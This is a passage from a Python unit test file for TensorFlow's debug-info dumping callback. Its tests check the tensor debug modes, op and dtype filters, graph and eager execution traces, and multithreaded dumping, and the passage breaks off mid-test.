with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
execution_iter = reader.execution_iterator()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
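      # Iterate over the logged execution events, checking that wall times are
      # non-decreasing and that the payloads match the tensor debug mode.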
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
execution = debug_event.execution
executed_op_types.append(execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.tensor_protos)
elif tensor_debug_mode == "CURT_HEALTH":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1.0, 0.0])
elif tensor_debug_mode == "CONCISE_HEALTH":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: each scalar tensor has 1 element.
# Remaining elements: no -inf, inf or nan in these
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1, 1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: dtype enum value (float32).
# 3rd element: rank (scalar).
# 4th element: element count (4).
# Remaining elements: shape at fixed length (6).
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1, 1, 0, 1, 0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
# Under the FULL_TENSOR mode, the value of the tensor should be
# available through `tensor_protos`.
tensor_value = float(
tensor_util.MakeNdarray(execution.tensor_protos[0]))
tensor_values[execution.op_type].append(tensor_value)
# Verify the code_location field.
self.assertTrue(execution.code_location.stack_frame_ids)
for stack_frame_id in execution.code_location.stack_frame_ids:
self.assertIn(stack_frame_id, stack_frame_by_id)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
graphs_iterator = reader.graphs_iterator()
with self.assertRaises(StopIteration):
next(graphs_iterator)
graph_trace_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(graph_trace_iter)
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testModesSummarizingBadNumericalValue(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return (x + y) / (x - y)
x = np.array([-3, -1, 0, 0, 1, 1, 1, 2], dtype=np.float16)
y = np.array([2, -1, 0, 0, 1, 1, 1, 3], dtype=np.float16)
# (x + y) / (x - y) = [0.2, -inf, nan, nan, inf, inf, inf, -5].
self.evaluate(func(x, y))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids,
_, op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertCountEqual(executed_op_types, ["AddV2", "Sub", "RealDiv"])
if tensor_debug_mode == "CURT_HEALTH":
for op_type, tensor_value in zip(executed_op_types, tensor_values):
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
if op_type == "RealDiv":
self.assertEqual(tensor_value[1], 1)
else:
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "CONCISE_HEALTH":
for op_type, tensor_value in zip(executed_op_types, tensor_values):
self.assertLen(tensor_value, 5)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: element count.
self.assertEqual(tensor_value[1], 8)
# Remaining 3 elements: The counts of -inf, inf and nan.
if op_type == "RealDiv":
self.assertAllClose(tensor_value[2:], [1, 3, 2])
else:
self.assertAllClose(tensor_value[2:], [0, 0, 0])
else: # SHAPE.
for op_type, tensor_value in zip(executed_op_types, tensor_values):
self.assertLen(tensor_value, 10)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: dtype enum value (float16).
self.assertEqual(tensor_value[1], 19)
# 3rd element: rank (1)
self.assertEqual(tensor_value[2], 1)
# 4th element: element count.
self.assertEqual(tensor_value[3], 8)
# Remaining elements: shape at fixed length.
self.assertAllClose(tensor_value[4:], [8, 0, 0, 0, 0, 0])
@parameterized.named_parameters(
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testBooleanTensors(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return math_ops.logical_not(math_ops.logical_and(x, y))
    x = np.array([[False, False], [True, True]], dtype=np.bool_)
    y = np.array([[False, True], [False, True]], dtype=np.bool_)
self.assertAllEqual(
self.evaluate(func(x, y)), [[True, True], [True, False]])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids,
_, op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types, ["LogicalAnd", "LogicalNot"])
for tensor_value in tensor_values:
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: dtype enum value (bool).
self.assertEqual(tensor_value[1], 10)
# 3rd element: rank (2)
self.assertEqual(tensor_value[2], 2)
# 4th element: element count.
self.assertEqual(tensor_value[3], 4)
# Remaining elements: shape at fixed length.
self.assertAllClose(tensor_value[4:], [2, 2, 0, 0, 0, 0])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
executed_op_types = [op_type for op_type in executed_op_types
if "sin1p_log_sum" in op_type]
self.assertLen(executed_op_types, 1)
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
if context.executing_eagerly():
# Check the correctness of the ID of the executed graph ID.
sin_op_name = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sin"]
self.assertLen(sin_op_name, 1)
sin_context_id = op_name_to_context_id[sin_op_name[0]]
# The executed "op" is a FuncGraph, and its graph ID should have been
# recorded properly and be the ID of the graph that the Sin op belongs to.
executed_graph_ids = [
executed_graph_ids[i] for i, op_type
in enumerate(executed_op_types) if "sin1p_log_sum" in op_type]
self.assertEqual(executed_graph_ids[0], sin_context_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2", "Sin"])
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "CONCISE_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 5)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(tensor_value[1:], [1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
for tensor_value in tensor_values:
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: dtype (float32).
self.assertGreaterEqual(tensor_value[1], 1)
# 3rd element: rank (scalar).
self.assertGreaterEqual(tensor_value[2], 0)
# 4th element: element count.
self.assertGreaterEqual(tensor_value[3], 1)
# Remaining elements: shape padded to fixed length.
self.assertAllClose(tensor_value[4:], [0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(tensor_values[3],
np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17.) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Verify the content of the .graphs file.
context_ids, op_types, op_name_to_op_type, _ = (
self._readAndCheckGraphsFile(stack_frame_by_id))
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should both be empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
graph_execution_traces_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
with self.assertRaises(StopIteration):
next(graph_execution_traces_iter)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
if context.executing_eagerly():
(executed_op_types, _, input_tensor_ids, output_tensor_ids,
tensor_debug_modes, tensor_values) = self._readAndCheckExecutionFile()
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
self.assertLen(executed_op_types, 1)
self.assertIn("iterative_doubling", executed_op_types[0])
self.assertLen(input_tensor_ids[0], 2)
self.assertLen(output_tensor_ids[0], 1)
self.assertEqual(
tensor_debug_modes[0],
debug_event_pb2.TensorDebugMode.Value(tensor_debug_mode))
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values, [[8.0]])
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
# The AddV2 op should have been run, but we refrain from asserting on how
# many times it's executed.
self.assertIn("AddV2", executed_op_types)
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Less"
]
self.assertAllClose(less_values, [True, True, True, True, False])
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(new_dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
with debug_events_reader.DebugEventsReader(
self.dump_root) as old_dump_root_reader:
execution_iter = old_dump_root_reader.execution_iterator()
# The old dump root shouldn't have been written to.
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert that calling enable_dump_debug_info() with different tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
context_ids, _, _, _ = self._readAndCheckGraphsFile(stack_frame_by_id)
_, _, _, _, _, tensor_values = self._readAndCheckExecutionFile()
self.assertEqual(tensor_values, [[]])
(_, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
self.assertLen(tensor_values, 2)
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
stack_frames_iter = reader.stack_frames_iterator()
execution_iter = reader.execution_iterator()
# No source-file, stack-frame or execution data should have been dumped.
with self.assertRaises(StopIteration):
next(source_files_iter)
with self.assertRaises(StopIteration):
next(stack_frames_iter)
with self.assertRaises(StopIteration):
next(execution_iter)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
prev_wall_time = 1
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, output_slots,
